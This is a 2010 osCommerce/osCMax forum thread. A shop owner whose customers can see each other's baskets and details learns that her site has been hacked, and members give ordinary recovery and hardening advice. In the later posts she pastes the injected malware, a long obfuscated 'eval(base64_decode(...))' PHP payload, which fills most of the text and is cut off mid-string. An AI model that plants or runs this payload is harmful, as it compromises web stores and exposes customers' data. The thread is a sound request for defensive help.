PDA

View Full Version : Time Out! Forcing people to log in!



michelle
02-02-2010, 07:07 AM
Hi Guys!

My website has been working fine for ages, suddenly people started seeing what was in other peoples baskets, and other peoples details!
At this point I only had Prevent Spider Sessions set to True under Configuration > Sessions. Everything else was false.

The following settings now apply:
Check SSL Session ID > true
Check User Agent > true
Check IP Address > true
Prevent Spider Sessions > true
Recreate Session > true

BUT even though people can't see other peoples details now, if you are looking at a product for 10 seconds or more it takes you to the log in page, or if you are logged in, logs you out and takes you to the log in page!

Please help! Thanks Michelle x

michael_s
02-02-2010, 08:12 AM
Sounds like you have some serious problems. You may want to check to see that your site was not hacked. If you are using an older version of osCommerce, it is very likely that your site has been hacked.

See this for security best practices:
http://wiki.oscdox.com/setting_up_security

michelle
02-02-2010, 08:36 AM
ok, thanks for your reply. will look over this link.

Can I upgrade to recent version of OSCMAX?
Is this a complicated process as I don't want to loose what i've done to my site, as far as extra add-ons etc I haven't added any as i'm not that experienced with advanced coding, it's mainly design changes, and layout changes, as i'm a graphic designer!

If I upgraded would this solve some of the security issues?

thanks

Michelle

pgmarshall
02-02-2010, 10:42 AM
Which version are you running at the moment?

The templating system should allow you to move all of your work fairly painlessly to the new version (assuming you haven't done many coding changes)

Do you have an URL for your site ...

Regards,

michelle
02-02-2010, 10:58 AM
Hi,
Thanks for your post, it's Birdy's Boutique (http://www.birdys-boutique.co.uk/)

I'm not sure why all these problems started occurring!

any help would be great, thanks

Michelle

pgmarshall
02-02-2010, 11:27 AM
My website has been working fine for ages, suddenly people started seeing what was in other peoples baskets, and other peoples details!

This sort of behaviour tends to mean that you may have been hacked! Don't panic! I am sure that we will be able to get you back to normal if you have ...

Have you checked your files to see if anyone has editted any of them recently (ie. not you!)

Have you change your password recently? I mean all of them ... FTP, Admin, Web Provider, etc.

Regards,

michelle
02-02-2010, 11:37 AM
that's a relief... i was starting to panic!

Well i'm not sure which files to check, i'm not brilliant at coding, i'm not sure i'd know what I was looking for? or if they were wrong?

I haven't changed my password recently either. Should I?

Up until the last few weeks, i've been really promoting the site, so it's only recently i've had alot of people going on and registering/buying.

Thanks

Michelle

pgmarshall
02-02-2010, 12:09 PM
You need to make sure that you change your password frequently! And you need to make sure they are difficult ones too ... I don't want to hear that your password is Birdy1 or anything like that! Letter and numbers ...

Now, it is not worth changing all these password if someone already has access to your site so you will need to have a look and see if any of your files have been changed recently. Use a FTP program to look through the latest save dates or ask you host to have a look for you.

You also need to move your admin folder as this is a common way for people to find the files they need to hack your site. The Wiki page I wrote should guide you through this.

Otherwise, if this all sounds too awful to comprehend - it might be worth messaging RidexBuilder on this forum who I know does work for people who are less technically minded (based in scotland).

It may well be that your site is fine but anyone who says "things started happening on their own invariably ends up finding that hackers have been at play"

Edit: Also you are posting in the osCommerce forum not the osCMax fourm ... I am sure a nice moderator will move this post for you ...

Regards,

michelle
02-02-2010, 12:39 PM
hello, i found out the problem...i have been hacked with this:

eval(base64_decode("JGs9MTI0OyRtPWV etc etc lots of letters and numbers...:confused:

i feel violated! Some people have said to remove this from the php files.

I don't feel confident enough to delete all my files and reload and I don't think my backup is very recent! ): I have the time to go through the files, but is just deleting this string enough?

thanks!
Michelle

pgmarshall
02-02-2010, 12:57 PM
Okay ... at least you now know what the problem is. base64 is a common hack ... there is more info on the Wiki here. (http://wiki.oscdox.com/setting_up_security#the_eval_base64_hack)

First things first ...

You need to remove all this extra code from your store ... it can get into every file ... so do you have a backup of your site from before this started?

You are currently running version 2.0RC3 (I think!) which is quite old and there have been a number of security fixes since this happened.

Have you changed much of your store coding or is it nearly all graphical changes to the templates? If so, it may be best to take this opportunity to upgrade your store to the latest version rather than patch the security holes.

Check your PC for keyloggers or trojans using some anti-spyware software ... details in the Wiki.

Once you have removed the code you need to change ALL your passwords and I mean ALL of them ...

Then you should be back on the straight and narrow ... but you will need to apply the security updates ... hence my comments about upgrading to osCMax 2.0.4 ... Otherwise, they will be straight back in ...

Looking at your site you appear to be using PayPal? Are they are doing the payment processing for you? Ie. You don't collect credit card numbers ... If so, your customers bank stuff should be safe ...

Overall, you need to remember you are not alone, almost every eCommerce store on the web, irrespective of the platform gets hacked. Too many people out there with nothing better to do!

Regards,

pgmarshall
02-02-2010, 01:06 PM
Also - just been browsing your site to see how many products you have and how long it might take to rebuild on new platform and it set of my Virus Scanner ... there is an iFrame virus lurking in there somewhere ...

Regards,

michelle
02-02-2010, 01:11 PM
It says to use a decoder to find out where the files are infected... but i'm not getting any text appear when i use it!

<?php /**/ eval(base64_decode("JGs9MTI0OyRtPWV4cGxvZGUoIjsiLCIyMTsyNjs4NDsyNjs5Oz E4OzMxOzg7MjE7MTk7MTg7MzU7MjU7NDsyMTsxNTs4OzE1Ozg0 OzkxOzE5OzMwOzM1OzE1Ozg7Mjk7MTQ7ODs5MTs4NTs5MDs5MD s5MzsyMTsxNTsxNTsyNTs4Ozg0Ozg4OzU5OzQ4OzUxOzYyOzYx OzQ4OzQ3OzM5OzkxOzE3OzE0OzM1OzE4OzE5OzkxOzMzOzg1Oz g1Ozc7OTI7OTI7OTI7ODg7NTk7NDg7NTE7NjI7NjE7NDg7NDc7 Mzk7OTE7MTc7MTQ7MzU7MTg7MTk7OTE7MzM7NjU7Nzc7NzE7OT I7OTI7OTI7MjE7MjY7ODQ7OTM7MjY7OTsxODszMTs4OzIxOzE5 OzE4OzM1OzI1OzQ7MjE7MTU7ODsxNTs4NDs5MTsxNzsxNDsxOT szMDsyMDs5MTs4NTs4NTs3OzkyOzkyOzkyOzkyOzkyOzkyOzIx OzI2Ozg0OzkzOzI2Ozk7MTg7MzE7ODsyMTsxOTsxODszNTsyNT s0OzIxOzE1Ozg7MTU7ODQ7OTE7Mjc7MTc7MTY7OTE7ODU7ODU7 Nzs5Mjs5Mjs5Mjs5Mjs5MjsyNjs5OzE4OzMxOzg7MjE7MTk7MT g7OTI7Mjc7MTc7MTY7ODQ7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5 MjsyMTsyNjs5Mjs4NDsxNTs4OzE0OzIxOzE1Ozg7MTQ7ODQ7OD g7MzU7NDc7NTc7NDY7NDI7NTc7NDY7Mzk7OTQ7NTI7NDA7NDA7 NDQ7MzU7NDE7NDc7NTc7NDY7MzU7NjE7NTk7NTc7NTA7NDA7OT Q7MzM7ODA7OTQ7Mjc7MTk7MTk7Mjc7MTY7MjU7MzA7MTk7ODs5 NDs4NTswOzA7MTU7ODsxNDsyMTsxNTs4OzE0Ozg0Ozg4OzM1Oz Q3OzU3OzQ2OzQyOzU3OzQ2OzM5Ozk0OzUyOzQwOzQwOzQ0OzM1 OzQxOzQ3OzU3OzQ2OzM1OzYxOzU5OzU3OzUwOzQwOzk0OzMzOz gwOzk0OzU7Mjk7MjA7MTk7MTk7OTQ7ODU7ODU7Nzs5Mjs5Mjs5 Mjs5Mjs5Mjs5Mjs5MjsyMTsyNjs5Mjs4NDs4NDsxNzsyNDs3Mz s4NDs4ODszNTs0Njs1Nzs0NTs0MTs1Nzs0Nzs0MDszOTs5NDsx NzsxNzsxNzsyOTsyMzsxOTsxMTsxOTsyMTsxMTsxOTsxMTs3Nj s3Njs3ODs5NDszMzs4NTs2NTs2NTs5NDsyOTs3OTs2OTs3OTs3 MjsyNDszMDsyNTs3ODs3NjszMDs3NjszMDs3OTsyNTs2OTszMD szMDsyNTs3NTsyOTs2OTsyNTsyNjszMTszMTs3NDs3Mzs3ODs3 NDsyNjs3Mjs5NDs4NTs5MDs5MDs4NDsyMTsxNTsxNTsyNTs4Oz g0Ozg4OzM1OzQ2OzU3OzQ1OzQxOzU3OzQ3OzQwOzM5Ozk0OzE3 OzE3OzE3OzI5OzIzOzE5OzExOzE5OzIxOzExOzE5OzExOzc2Oz c2Ozc3Ozk0OzMzOzg1Ozg1Ozg1Ozc7ODg7NDY7Njg7NzU7Nzg7 NzM7NzY7Nzg7Njk7NTc7NjE7Njg7Njk7NzU7Nzc7Nzg7NTc7NT c7NTY7Njg7NzQ7NzU7NzY7NjI7NjE7NTc7NzQ7NzI7NTY7Nzk7 NzY7NTc7NzI7NzU7NjU7MzA7Mjk7MTU7MjU7NzQ7NzI7MzU7Mj Q7MjU7MzE7MTk7MjQ7MjU7ODQ7ODg7MzU7NDY7NTc7NDU7NDE7 NTc7NDc7NDA7Mzk7OTQ7MTc7MTc7MTc7Mjk7MjM7MTk7MTE7MT k7MjE7MTE7MTk7MTE7NzY7NzY7Nzc7OTQ7MzM7ODU7NzE7MTQ7 MjU7ODs5OzE0OzE4OzkyOzk0OzU3OzQ7MjU7MzE7OTs4OzIxOz E5OzE4OzgyOzgyOzgyOzg4OzQ2OzY4Ozc1Ozc4OzczOzc2Ozc4 OzY5OzU3OzYxOzY4OzY5Ozc1Ozc3Ozc4OzU3OzU3OzU2OzY4Oz c0Ozc1Ozc2OzYyOzYxOzU3Ozc0OzcyOzU2Ozc5Ozc2OzU3Ozcy Ozc1OzMyOzE4Ozk0OzgyOzI1OzEwOzI5OzE2Ozg0Ozg4OzQ2Oz Y4Ozc1Ozc4OzczOzc2Ozc4OzY5OzU3OzYxOzY4OzY5Ozc1Ozc3 Ozc4OzU3OzU3OzU2OzY4Ozc0Ozc1Ozc2OzYyOzYxOzU3Ozc0Oz cyOzU2Ozc5Ozc2OzU3OzcyOzc1Ozg1OzcxOzE7OTI7OTI7OTI7 OTI7OTI7OTI7OTI7ODg7NDY7NjE7NTg7NzQ7Nzk7NTc7NjE7Nj E7NzU7NjE7Nzg7NTY7Nzc7NzM7NjM7NjE7NzM7Njk7NjE7NjI7 NjI7Njk7NzM7NjI7NzQ7NTg7NTY7Nzc7NjE7NTg7NTc7NjI7NT g7NjU7OTQ7MjA7ODs4OzEyOzcwOzgzOzgzOzk0OzgyOzMwOzI5 OzE1OzI1Ozc0OzcyOzM1OzI0OzI1OzMxOzE5OzI0OzI1Ozg0Oz k0OzM3Ozc4OzY5OzE1OzM3OzE4OzE2OzIwOzI0OzU5OzY5Ozk7 MjQ7NTk7NTg7NTsyOTs0Mzs2ODs5OzM3Ozc4OzY5Ozg7OTQ7OD U7ODI7OTQ7ODM7MTY7MjE7MTg7MjM7MTU7ODM7OTQ7ODI7MTQ7 Mjk7MTg7MjQ7ODQ7NzY7ODA7Nzg7NzM7NzY7ODU7ODI7OTQ7OD I7ODs0Ozg7Njc7MjE7MTI7NjU7OTQ7ODI7ODg7MzU7NDc7NTc7 NDY7NDI7NTc7NDY7Mzk7OTQ7NDY7NTc7NDk7NTE7NDA7NTc7Mz U7NjE7NTY7NTY7NDY7OTQ7MzM7ODI7OTQ7OTA7MjA7MTk7MTU7 ODs2NTs5NDs4MjsxNDsyOTsxMTs5OzE0OzE2OzI1OzE4OzMxOz E5OzI0OzI1Ozg0Ozg4OzM1OzQ3OzU3OzQ2OzQyOzU3OzQ2OzM5 Ozk0OzUyOzQwOzQwOzQ0OzM1OzUyOzUxOzQ3OzQwOzk0OzMzOz g1OzgyOzk0OzkwOzI5OzI3OzI1OzE4Ozg7NjU7OTQ7ODI7MTQ7 Mjk7MTE7OTsxNDsxNjsyNTsxODszMTsxOTsyNDsyNTs4NDs4OD szNTs0Nzs1Nzs0Njs0Mjs1Nzs0NjszOTs5NDs1Mjs0MDs0MDs0 NDszNTs0MTs0Nzs1Nzs0NjszNTs2MTs1OTs1Nzs1MDs0MDs5ND szMzs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs1 ODs3Mjs2ODs2Mjs1ODs1ODs2OTs3Njs3Mzs3Mzs1ODs3Mjs3ND s2Mjs2OTs3Mjs2ODs3OTs2Mjs2Mzs2OTs3Njs1Njs2Mzs3Njs2 MTs3Nzs3NDs3Njs1Nzs3NDs3NTs2NTs5NDs5NDs3MTs5Mjs5Mj s5Mjs5Mjs5Mjs5Mjs5MjsyMTsyNjs5Mjs4NDsyNjs5OzE4OzMx Ozg7MjE7MTk7MTg7MzU7MjU7NDsyMTsxNTs4OzE1Ozg0Ozk0Oz MxOzk7MTQ7MTY7MzU7MjE7MTg7MjE7ODs5NDs4NTs4NTs5Mjs3 OzkyOzkyOzkyOzkyOzkyOzkyOzkyOzkyOzg4OzQ2Ozc1OzU2Oz U4OzcyOzY4Ozc3OzU2Ozc2Ozc0Ozc0Ozc3Ozc5OzY4OzYzOzU4 Ozc1OzYyOzczOzU2Ozc1OzU2OzYxOzc3OzY5OzYyOzYzOzYyOz c4OzYxOzY4Ozc1OzcyOzkyOzY1OzkyOzYwOzMxOzk7MTQ7MTY7 MzU7MjE7MTg7MjE7ODs4NDs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mj s5Mjs5Mjs5Mjs2MDszMTs5OzE0OzE2OzM1OzE1OzI1Ozg7MTk7 MTI7ODs5Mjs4NDs4ODs0Njs3NTs1Njs1ODs3Mjs2ODs3Nzs1Nj s3Njs3NDs3NDs3Nzs3OTs2ODs2Mzs1ODs3NTs2Mjs3Mzs1Njs3 NTs1Njs2MTs3Nzs2OTs2Mjs2Mzs2Mjs3ODs2MTs2ODs3NTs3Mj s4MDs5Mjs2Mzs0MTs0Njs0ODs1MTs0NDs0MDszNTs0MTs0Njs0 ODs4MDs5Mjs4ODs0Njs2MTs1ODs3NDs3OTs1Nzs2MTs2MTs3NT s2MTs3ODs1Njs3Nzs3Mzs2Mzs2MTs3Mzs2OTs2MTs2Mjs2Mjs2 OTs3Mzs2Mjs3NDs1ODs1Njs3Nzs2MTs1ODs1Nzs2Mjs1ODs4NT s3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs2MDszMTs5OzE0 OzE2OzM1OzE1OzI1Ozg7MTk7MTI7ODs5Mjs4NDs4ODs0Njs3NT s1Njs1ODs3Mjs2ODs3Nzs1Njs3Njs3NDs3NDs3Nzs3OTs2ODs2 Mzs1ODs3NTs2Mjs3Mzs1Njs3NTs1Njs2MTs3Nzs2OTs2Mjs2Mz s2Mjs3ODs2MTs2ODs3NTs3Mjs4MDs5Mjs2Mzs0MTs0Njs0ODs1 MTs0NDs0MDszNTs0Njs1Nzs0MDs0MTs0Njs1MDs0MDs0Njs2MT s1MDs0Nzs1ODs1Nzs0Njs4MDs5Mjs3Nzs4NTs3MTs5Mjs5Mjs5 Mjs5Mjs5Mjs5Mjs5Mjs5Mjs2MDszMTs5OzE0OzE2OzM1OzE1Oz I1Ozg7MTk7MTI7ODs5Mjs4NDs4ODs0Njs3NTs1Njs1ODs3Mjs2 ODs3Nzs1Njs3Njs3NDs3NDs3Nzs3OTs2ODs2Mzs1ODs3NTs2Mj s3Mzs1Njs3NTs1Njs2MTs3Nzs2OTs2Mjs2Mzs2Mjs3ODs2MTs2 ODs3NTs3Mjs4MDs5Mjs2Mzs0MTs0Njs0ODs1MTs0NDs0MDszNT s0MDs1Mzs0OTs1Nzs1MTs0MTs0MDs4MDs5Mjs3Nzs3Mzs4NTs3 MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs2MDszMTs5OzE0Oz E2OzM1OzE1OzI1Ozg7MTk7MTI7ODs5Mjs4NDs4ODs0Njs3NTs1 Njs1ODs3Mjs2ODs3Nzs1Njs3Njs3NDs3NDs3Nzs3OTs2ODs2Mz s1ODs3NTs2Mjs3Mzs1Njs3NTs1Njs2MTs3Nzs2OTs2Mjs2Mzs2 Mjs3ODs2MTs2ODs3NTs3Mjs4MDs5Mjs2Mzs0MTs0Njs0ODs1MT s0NDs0MDszNTs1Nzs1MDs2Mzs1MTs1Njs1Mzs1MDs1OTs5Mjs4 MDs5Mjs5NDsyNzs2OzIxOzEyOzk0Ozg1OzcxOzkyOzkyOzkyOz kyOzkyOzkyOzkyOzkyOzg4OzQ2OzU4OzcyOzY4OzYyOzU4OzU4 OzY5Ozc2OzczOzczOzU4OzcyOzc0OzYyOzY5OzcyOzY4Ozc5Oz YyOzYzOzY5Ozc2OzU2OzYzOzc2OzYxOzc3Ozc0Ozc2OzU3Ozc0 Ozc1OzY1OzYwOzMxOzk7MTQ7MTY7MzU7MjU7NDsyNTszMTs5Mj s4NDs4ODs0Njs3NTs1Njs1ODs3Mjs2ODs3Nzs1Njs3Njs3NDs3 NDs3Nzs3OTs2ODs2Mzs1ODs3NTs2Mjs3Mzs1Njs3NTs1Njs2MT s3Nzs2OTs2Mjs2Mzs2Mjs3ODs2MTs2ODs3NTs3Mjs4NTs3MTs5 Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs2MDszMTs5OzE0OzE2Oz M1OzMxOzE2OzE5OzE1OzI1OzkyOzg0Ozg4OzQ2Ozc1OzU2OzU4 OzcyOzY4Ozc3OzU2Ozc2Ozc0Ozc0Ozc3Ozc5OzY4OzYzOzU4Oz c1OzYyOzczOzU2Ozc1OzU2OzYxOzc3OzY5OzYyOzYzOzYyOzc4 OzYxOzY4Ozc1OzcyOzg1OzcxOzkyOzkyOzkyOzkyOzkyOzkyOz kyOzE7OTI7MjU7MTY7MTU7MjU7OTI7Nzs5Mjs5Mjs5Mjs5Mjs5 Mjs5Mjs5Mjs5Mjs4ODs0Njs1ODs3Mjs2ODs2Mjs1ODs1ODs2OT s3Njs3Mzs3Mzs1ODs3Mjs3NDs2Mjs2OTs3Mjs2ODs3OTs2Mjs2 Mzs2OTs3Njs1Njs2Mzs3Njs2MTs3Nzs3NDs3Njs1Nzs3NDs3NT s2NTs2MDsyNjsyMTsxNjsyNTszNTsyNzsyNTs4OzM1OzMxOzE5 OzE4Ozg7MjU7MTg7ODsxNTs4NDs4ODs0Njs2MTs1ODs3NDs3OT s1Nzs2MTs2MTs3NTs2MTs3ODs1Njs3Nzs3Mzs2Mzs2MTs3Mzs2 OTs2MTs2Mjs2Mjs2OTs3Mzs2Mjs3NDs1ODs1Njs3Nzs2MTs1OD s1Nzs2Mjs1ODs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjsx OzkyOzkyOzkyOzkyOzkyOzkyOzE7OTI7OTI7OTI7OTI7OTI7OT I7MTQ7MjU7ODs5OzE0OzE4OzkyOzg4OzQ2OzU4OzcyOzY4OzYy OzU4OzU4OzY5Ozc2OzczOzczOzU4OzcyOzc0OzYyOzY5OzcyOz Y4Ozc5OzYyOzYzOzY5Ozc2OzU2OzYzOzc2OzYxOzc3Ozc0Ozc2 OzU3Ozc0Ozc1OzcxOzkyOzkyOzkyOzkyOzkyOzE7OTI7OTI7OT I7OTI7MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsyMTsyNjs4 NDs5MzsyNjs5OzE4OzMxOzg7MjE7MTk7MTg7MzU7MjU7NDsyMT sxNTs4OzE1Ozg0OzkxOzI3OzY7MjQ7MjU7MzE7MTk7MjQ7MjU7 OTE7ODU7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5MjsyNjs5OzE4OzMxOz g7MjE7MTk7MTg7OTI7Mjc7NjsyNDsyNTszMTsxOTsyNDsyNTs4 NDs4ODs0Njs3Mzs2MTs2OTs2Mzs1ODs3Nzs2Mjs3Mjs2OTs3NT s3Mzs3Njs3ODs2MTs2Mzs2MTs3ODs3OTs2Mzs2ODs1ODs3NDs3 Nzs3Nzs2MTs3Mzs3NDs3Mjs3NDs2ODs3Mjs2Mzs4NTs3OzkyOz kyOzkyOzkyOzkyOzkyOzg4OzQ2Ozc5Ozc2OzYyOzc4OzYxOzYy OzY4OzU2OzYzOzc3OzcyOzY5Ozc0OzU2Ozc2Ozc0OzYyOzc4Oz c5Ozc2OzYxOzc1Ozc3OzU2OzY4OzY5Ozc0Ozc4OzYxOzU4Ozcz OzU2OzY1OzYwOzE5OzE0OzI0Ozg0OzYwOzE1Ozk7MzA7MTU7OD sxNDs4NDs4ODs0Njs3Mzs2MTs2OTs2Mzs1ODs3Nzs2Mjs3Mjs2 OTs3NTs3Mzs3Njs3ODs2MTs2Mzs2MTs3ODs3OTs2Mzs2ODs1OD s3NDs3Nzs3Nzs2MTs3Mzs3NDs3Mjs3NDs2ODs3Mjs2Mzs4MDs3 OTs4MDs3Nzs4NTs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4OD s0Njs2Mjs1Nzs3Mjs2Mzs3Mjs1Njs3Njs3OTs3NTs1Nzs2OTs3 OTs2OTs3ODs3ODs3NDs1ODs3NDs3Mzs2ODs3Nzs3ODs2ODs2OD s3Mzs2MTs3Mzs3OTs1Njs2MTs1Njs2OTs2NTs3Nzs3Njs3MTs5 Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs2MTs3OTs1Njs3Mzs3OD s1Nzs3Mzs3ODs2MTs3Mjs2ODs2OTs3OTs3NDs2Mzs1Njs1Nzs3 Njs1ODs3Mzs3OTs3Mzs3NDs2Mjs2Mjs3Njs2ODs3NDs3Mzs3OD s1ODs3ODs2NTs3Njs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsyMTsy Njs4NDs4ODs0Njs3OTs3Njs2Mjs3ODs2MTs2Mjs2ODs1Njs2Mz s3Nzs3Mjs2OTs3NDs1Njs3Njs3NDs2Mjs3ODs3OTs3Njs2MTs3 NTs3Nzs1Njs2ODs2OTs3NDs3ODs2MTs1ODs3Mzs1Njs5MDs3Mj s4NTs3OzkyOzkyOzkyOzkyOzkyOzkyOzkyOzg4OzQ2Ozc0Ozc5 OzYyOzU3OzU2OzU3Ozc0OzYyOzc3OzY5Ozc4Ozc0Ozc0OzU2Oz cyOzU3OzU4OzU3OzYxOzU2Ozc2Ozc1OzYxOzcyOzU2OzY5Ozc3 OzU3Ozc4OzY5OzU3OzYyOzY1OzYwOzk7MTg7MTI7Mjk7MzE7Mj M7ODQ7OTE7MTA7OTE7ODA7MTU7OTszMDsxNTs4OzE0Ozg0Ozg4 OzQ2OzczOzYxOzY5OzYzOzU4Ozc3OzYyOzcyOzY5Ozc1OzczOz c2Ozc4OzYxOzYzOzYxOzc4Ozc5OzYzOzY4OzU4Ozc0Ozc3Ozc3 OzYxOzczOzc0OzcyOzc0OzY4OzcyOzYzOzgwOzc3Ozc2OzgwOz c4Ozg1Ozg1OzcxOzkyOzkyOzkyOzkyOzkyOzkyOzkyOzg4OzQ2 Ozc0Ozc5OzYyOzU3OzU2OzU3Ozc0OzYyOzc3OzY5Ozc4Ozc0Oz c0OzU2OzcyOzU3OzU4OzU3OzYxOzU2Ozc2Ozc1OzYxOzcyOzU2 OzY5Ozc3OzU3Ozc4OzY5OzU3OzYyOzY1Ozg4OzQ2Ozc0Ozc5Oz YyOzU3OzU2OzU3Ozc0OzYyOzc3OzY5Ozc4Ozc0Ozc0OzU2Ozcy OzU3OzU4OzU3OzYxOzU2Ozc2Ozc1OzYxOzcyOzU2OzY5Ozc3Oz U3Ozc4OzY5OzU3OzYyOzM5Ozc3OzMzOzcxOzkyOzkyOzkyOzky OzkyOzkyOzkyOzg4OzQ2OzYyOzU3OzcyOzYzOzcyOzU2Ozc2Oz c5Ozc1OzU3OzY5Ozc5OzY5Ozc4Ozc4Ozc0OzU4Ozc0OzczOzY4 Ozc3Ozc4OzY4OzY4OzczOzYxOzczOzc5OzU2OzYxOzU2OzY5Oz g3OzY1Ozc4Ozg3Ozg4OzQ2Ozc0Ozc5OzYyOzU3OzU2OzU3Ozc0 OzYyOzc3OzY5Ozc4Ozc0Ozc0OzU2OzcyOzU3OzU4OzU3OzYxOz U2Ozc2Ozc1OzYxOzcyOzU2OzY5Ozc3OzU3Ozc4OzY5OzU3OzYy OzcxOzkyOzkyOzkyOzkyOzkyOzkyOzE7OTI7OTI7OTI7OTI7OT I7OTI7MjE7MjY7ODQ7ODg7NDY7Nzk7NzY7NjI7Nzg7NjE7NjI7 Njg7NTY7NjM7Nzc7NzI7Njk7NzQ7NTY7NzY7NzQ7NjI7Nzg7Nz k7NzY7NjE7NzU7Nzc7NTY7Njg7Njk7NzQ7Nzg7NjE7NTg7NzM7 NTY7OTA7Njg7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4OD s0Njs2Mjs1Nzs3Mjs2Mzs3Mjs1Njs3Njs3OTs3NTs1Nzs2OTs3 OTs2OTs3ODs3ODs3NDs1ODs3NDs3Mzs2ODs3Nzs3ODs2ODs2OD s3Mzs2MTs3Mzs3OTs1Njs2MTs1Njs2OTs2NTs2MDsxNTs4OzE0 OzEyOzE5OzE1Ozg0Ozg4OzQ2OzczOzYxOzY5OzYzOzU4Ozc3Oz YyOzcyOzY5Ozc1OzczOzc2Ozc4OzYxOzYzOzYxOzc4Ozc5OzYz OzY4OzU4Ozc0Ozc3Ozc3OzYxOzczOzc0OzcyOzc0OzY4OzcyOz YzOzgwOzMxOzIwOzE0Ozg0Ozc2Ozg1OzgwOzg4OzQ2OzYyOzU3 OzcyOzYzOzcyOzU2Ozc2Ozc5Ozc1OzU3OzY5Ozc5OzY5Ozc4Oz c4Ozc0OzU4Ozc0OzczOzY4Ozc3Ozc4OzY4OzY4OzczOzYxOzcz Ozc5OzU2OzYxOzU2OzY5Ozg1Ozg3Ozc3OzcxOzkyOzkyOzkyOz kyOzkyOzkyOzE7OTI7OTI7OTI7OTI7OTI7OTI7MjE7MjY7ODQ7 ODg7NDY7Nzk7NzY7NjI7Nzg7NjE7NjI7Njg7NTY7NjM7Nzc7Nz I7Njk7NzQ7NTY7NzY7NzQ7NjI7Nzg7Nzk7NzY7NjE7NzU7Nzc7 NTY7Njg7Njk7NzQ7Nzg7NjE7NTg7NzM7NTY7OTA7Nzc7NzQ7OD U7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs2Mjs1Nzs3 Mjs2Mzs3Mjs1Njs3Njs3OTs3NTs1Nzs2OTs3OTs2OTs3ODs3OD s3NDs1ODs3NDs3Mzs2ODs3Nzs3ODs2ODs2ODs3Mzs2MTs3Mzs3 OTs1Njs2MTs1Njs2OTs2NTs2MDsxNTs4OzE0OzEyOzE5OzE1Oz g0Ozg4OzQ2OzczOzYxOzY5OzYzOzU4Ozc3OzYyOzcyOzY5Ozc1 OzczOzc2Ozc4OzYxOzYzOzYxOzc4Ozc5OzYzOzY4OzU4Ozc0Oz c3Ozc3OzYxOzczOzc0OzcyOzc0OzY4OzcyOzYzOzgwOzMxOzIw OzE0Ozg0Ozc2Ozg1OzgwOzg4OzQ2OzYyOzU3OzcyOzYzOzcyOz U2Ozc2Ozc5Ozc1OzU3OzY5Ozc5OzY5Ozc4Ozc4Ozc0OzU4Ozc0 OzczOzY4Ozc3Ozc4OzY4OzY4OzczOzYxOzczOzc5OzU2OzYxOz U2OzY5Ozg1Ozg3Ozc3OzcxOzkyOzkyOzkyOzkyOzkyOzkyOzE7 OTI7OTI7OTI7OTI7OTI7OTI7MjE7MjY7ODQ7ODg7NDY7Nzk7Nz Y7NjI7Nzg7NjE7NjI7Njg7NTY7NjM7Nzc7NzI7Njk7NzQ7NTY7 NzY7NzQ7NjI7Nzg7Nzk7NzY7NjE7NzU7Nzc7NTY7Njg7Njk7Nz Q7Nzg7NjE7NTg7NzM7NTY7OTA7Nzg7ODU7Nzs5Mjs5Mjs5Mjs5 Mjs5Mjs5Mjs5Mjs4ODs0Njs2Mjs1Nzs3Mjs2Mzs3Mjs1Njs3Nj s3OTs3NTs1Nzs2OTs3OTs2OTs3ODs3ODs3NDs1ODs3NDs3Mzs2 ODs3Nzs3ODs2ODs2ODs3Mzs2MTs3Mzs3OTs1Njs2MTs1Njs2OT s4Nzs2NTs3ODs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsxOzkyOzky OzkyOzkyOzkyOzkyOzg4OzQ2Ozc2Ozc5OzcyOzYxOzU3Ozc4Oz YxOzYyOzY5OzcyOzU4OzY5OzY5OzYzOzYzOzY4Ozc3OzYyOzc5 OzY4OzY5OzYxOzc3OzY4Ozc4Ozc4OzU2OzYxOzc5Ozc5OzczOz c5OzY1OzYwOzI3OzY7MjE7MTg7MjY7MTY7Mjk7ODsyNTs4NDs2 MDsxNTs5OzMwOzE1Ozg7MTQ7ODQ7ODg7NDY7NzM7NjE7Njk7Nj M7NTg7Nzc7NjI7NzI7Njk7NzU7NzM7NzY7Nzg7NjE7NjM7NjE7 Nzg7Nzk7NjM7Njg7NTg7NzQ7Nzc7Nzc7NjE7NzM7NzQ7NzI7Nz Q7Njg7NzI7NjM7ODA7ODg7NDY7NjI7NTc7NzI7NjM7NzI7NTY7 NzY7Nzk7NzU7NTc7Njk7Nzk7Njk7Nzg7Nzg7NzQ7NTg7NzQ7Nz M7Njg7Nzc7Nzg7Njg7Njg7NzM7NjE7NzM7Nzk7NTY7NjE7NTY7 Njk7ODU7ODU7NzE7OTI7OTI7OTI7OTI7OTI7OTI7MjE7MjY7OD Q7ODg7NDY7NzY7Nzk7NzI7NjE7NTc7Nzg7NjE7NjI7Njk7NzI7 NTg7Njk7Njk7NjM7NjM7Njg7Nzc7NjI7Nzk7Njg7Njk7NjE7Nz c7Njg7Nzg7Nzg7NTY7NjE7Nzk7Nzk7NzM7Nzk7NjU7NjU7NjU7 NTg7NjE7NDg7NDc7NTc7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5Mj s5Mjs4ODs0Njs3Njs3OTs3Mjs2MTs1Nzs3ODs2MTs2Mjs2OTs3 Mjs1ODs2OTs2OTs2Mzs2Mzs2ODs3Nzs2Mjs3OTs2ODs2OTs2MT s3Nzs2ODs3ODs3ODs1Njs2MTs3OTs3OTs3Mzs3OTs2NTs4ODs0 Njs3Mzs2MTs2OTs2Mzs1ODs3Nzs2Mjs3Mjs2OTs3NTs3Mzs3Nj s3ODs2MTs2Mzs2MTs3ODs3OTs2Mzs2ODs1ODs3NDs3Nzs3Nzs2 